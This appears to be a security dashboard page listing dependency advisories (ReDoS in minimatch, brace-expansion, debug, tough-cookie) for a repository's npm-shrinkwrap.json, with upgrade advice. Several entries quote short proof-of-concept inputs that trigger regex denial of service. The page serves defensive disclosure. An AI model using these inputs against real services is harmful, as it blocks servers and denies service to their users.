Sign upLogin

ramitos/rn-nested-stylesheet

View on GitHub
Star

Showing 11 of 11 total issues

minimatch Regular Expression Denial of Service
Open

            "minimatch": {
              "version": "3.0.0",
              "from": "minimatch@^3.0.0",
              "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.0.0.tgz",
              "dependencies": {
Severity: Minor
Found in npm-shrinkwrap.json by nodesecurity

Regular Expression Denial of Service

Overview:

Minimatch is a minimal matching utility that works by converting glob expressions into JavaScript RegExp objects. The primary function, minimatch(path, pattern) is vulnerable to ReDoS in the pattern parameter. This is because of the regular expression on line 521 of minimatch.js: /((?:\\{2})*)(\\?)\|/g,. The problematic portion of the regex is ((?:\\{2})*) which matches against \\.

A proof of concept is as follows: ``` var minimatch = require(“minimatch”);

// utility function for generating long strings var genstr = function (len, chr) { var result = “”; for (i=0; i<=len; i++) { result = result + chr; } return result; }

var exploit = “[!” + genstr(1000000, “\”) + “A”;

// minimatch exploit. console.log(“starting minimatch”); minimatch(“foo”, exploit); console.log(“finishing minimatch”); ```

Recommendation:

Updated to version 3.0.2 or greater

minimatch Regular Expression Denial of Service
Open

            "minimatch": {
              "version": "3.0.0",
              "from": "minimatch@^3.0.0",
              "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.0.0.tgz",
              "dependencies": {
Severity: Minor
Found in npm-shrinkwrap.json by nodesecurity

Regular Expression Denial of Service

Overview:

Minimatch is a minimal matching utility that works by converting glob expressions into JavaScript RegExp objects. The primary function, minimatch(path, pattern) is vulnerable to ReDoS in the pattern parameter. This is because of the regular expression on line 521 of minimatch.js: /((?:\\{2})*)(\\?)\|/g,. The problematic portion of the regex is ((?:\\{2})*) which matches against \\.

A proof of concept is as follows: ``` var minimatch = require(“minimatch”);

// utility function for generating long strings var genstr = function (len, chr) { var result = “”; for (i=0; i<=len; i++) { result = result + chr; } return result; }

var exploit = “[!” + genstr(1000000, “\”) + “A”;

// minimatch exploit. console.log(“starting minimatch”); minimatch(“foo”, exploit); console.log(“finishing minimatch”); ```

Recommendation:

Updated to version 3.0.2 or greater

brace-expansion ReDoS
Open

                "brace-expansion": {
                  "version": "1.1.3",
                  "from": "brace-expansion@^1.0.0",
                  "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.3.tgz",
                  "dependencies": {
Severity: Minor
Found in npm-shrinkwrap.json by nodesecurity

ReDoS

Overview:

brace-expansion is a module to support bash-like brace expansion in JavaScript. For example,{1,2,3,4} would expand to 1 2 3 4. brace expansion versions before 1.1.7 are vulnerable to Regular Expression Denial of Service attacks. A proof of concept is provided below:

var expand = require('brace-expansion');
expand('{,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\n}');

Recommendation:

Upgrade to version 1.1.7 or later.

debug Regular Expression Denial of Service
Open

    "debug": {
      "version": "2.2.0",
      "from": "debug@>=2.2.0 <3.0.0",
      "resolved": "https://registry.npmjs.org/debug/-/debug-2.2.0.tgz"
    },
Severity: Minor
Found in npm-shrinkwrap.json by nodesecurity

Regular Expression Denial of Service

Overview:

The debug module is vulnerable to regular expression denial of service when untrusted user input is passed into the o formatter. It takes around 50k characters to block for 2 seconds making this a low severity issue.

Recommendation:

Upgrade to version 2.6.9 or greater if you are on the 2.6.x series or 3.1.0 or greater.

minimatch Regular Expression Denial of Service
Open

            "minimatch": {
              "version": "3.0.0",
              "from": "minimatch@^3.0.0",
              "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.0.0.tgz",
              "dependencies": {
Severity: Minor
Found in npm-shrinkwrap.json by nodesecurity

Regular Expression Denial of Service

Overview:

Minimatch is a minimal matching utility that works by converting glob expressions into JavaScript RegExp objects. The primary function, minimatch(path, pattern) is vulnerable to ReDoS in the pattern parameter. This is because of the regular expression on line 521 of minimatch.js: /((?:\\{2})*)(\\?)\|/g,. The problematic portion of the regex is ((?:\\{2})*) which matches against \\.

A proof of concept is as follows: ``` var minimatch = require(“minimatch”);

// utility function for generating long strings var genstr = function (len, chr) { var result = “”; for (i=0; i<=len; i++) { result = result + chr; } return result; }

var exploit = “[!” + genstr(1000000, “\”) + “A”;

// minimatch exploit. console.log(“starting minimatch”); minimatch(“foo”, exploit); console.log(“finishing minimatch”); ```

Recommendation:

Updated to version 3.0.2 or greater

debug Regular Expression Denial of Service
Open

    "debug": {
      "version": "2.2.0",
      "from": "debug@>=2.2.0 <3.0.0",
      "resolved": "https://registry.npmjs.org/debug/-/debug-2.2.0.tgz"
    },
Severity: Minor
Found in npm-shrinkwrap.json by nodesecurity

Regular Expression Denial of Service

Overview:

The debug module is vulnerable to regular expression denial of service when untrusted user input is passed into the o formatter. It takes around 50k characters to block for 2 seconds making this a low severity issue.

Recommendation:

Upgrade to version 2.6.9 or greater if you are on the 2.6.x series or 3.1.0 or greater.

tough-cookie Regular Expression Denial of Service
Open

        "tough-cookie": {
          "version": "2.2.2",
          "from": "tough-cookie@~2.2.0",
          "resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.2.2.tgz"
        },
Severity: Minor
Found in npm-shrinkwrap.json by nodesecurity

Regular Expression Denial of Service

Overview:

The tough-cookie module is vulnerable to regular expression denial of service. Input of around 50k characters is required for a slow down of around 2 seconds.

Unless node was compiled using the -DHTTPMAXHEADER_SIZE= option the default header max length is 80kb so the impact of the ReDoS is limited to around 7.3 seconds of blocking.

At the time of writing all version <=2.3.2 are vulnerable

Recommendation:

Please update to version 2.3.3 or greater

brace-expansion ReDoS
Open

                "brace-expansion": {
                  "version": "1.1.3",
                  "from": "brace-expansion@^1.0.0",
                  "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.3.tgz",
                  "dependencies": {
Severity: Minor
Found in npm-shrinkwrap.json by nodesecurity

ReDoS

Overview:

brace-expansion is a module to support bash-like brace expansion in JavaScript. For example,{1,2,3,4} would expand to 1 2 3 4. brace expansion versions before 1.1.7 are vulnerable to Regular Expression Denial of Service attacks. A proof of concept is provided below:

var expand = require('brace-expansion');
expand('{,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\n}');

Recommendation:

Upgrade to version 1.1.7 or later.

brace-expansion ReDoS
Open

    "brace-expansion": {
      "version": "1.1.4",
      "from": "brace-expansion@>=1.0.0 <2.0.0",
      "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.4.tgz"
    },
Severity: Minor
Found in npm-shrinkwrap.json by nodesecurity

ReDoS

Overview:

brace-expansion is a module to support bash-like brace expansion in JavaScript. For example,{1,2,3,4} would expand to 1 2 3 4. brace expansion versions before 1.1.7 are vulnerable to Regular Expression Denial of Service attacks. A proof of concept is provided below:

var expand = require('brace-expansion');
expand('{,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\n}');

Recommendation:

Upgrade to version 1.1.7 or later.

minimatch Regular Expression Denial of Service
Open

    "minimatch": {
      "version": "2.0.10",
      "from": "minimatch@>=2.0.3 <3.0.0",
      "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-2.0.10.tgz"
    },
Severity: Minor
Found in npm-shrinkwrap.json by nodesecurity

Regular Expression Denial of Service

Overview:

Minimatch is a minimal matching utility that works by converting glob expressions into JavaScript RegExp objects. The primary function, minimatch(path, pattern) is vulnerable to ReDoS in the pattern parameter. This is because of the regular expression on line 521 of minimatch.js: /((?:\\{2})*)(\\?)\|/g,. The problematic portion of the regex is ((?:\\{2})*) which matches against \\.

A proof of concept is as follows: ``` var minimatch = require(“minimatch”);

// utility function for generating long strings var genstr = function (len, chr) { var result = “”; for (i=0; i<=len; i++) { result = result + chr; } return result; }

var exploit = “[!” + genstr(1000000, “\”) + “A”;

// minimatch exploit. console.log(“starting minimatch”); minimatch(“foo”, exploit); console.log(“finishing minimatch”); ```

Recommendation:

Updated to version 3.0.2 or greater

tough-cookie ReDoS via long string of semicolons
Open

        "tough-cookie": {
          "version": "2.2.2",
          "from": "tough-cookie@~2.2.0",
          "resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.2.2.tgz"
        },
Severity: Minor
Found in npm-shrinkwrap.json by nodesecurity

ReDoS via long string of semicolons

Overview:

Tough-cookie is a cookie parsing and management library.

Versions 0.9.7 through 2.2.2 contain a vulnerable regular expression that, under certain conditions involving long strings of semicolons in the "Set-Cookie" header, causes the event loop to block for excessive amounts of time.

Recommendation:

Upgrade to at least version 2.3.0

Severity
Category
Status
Source
Language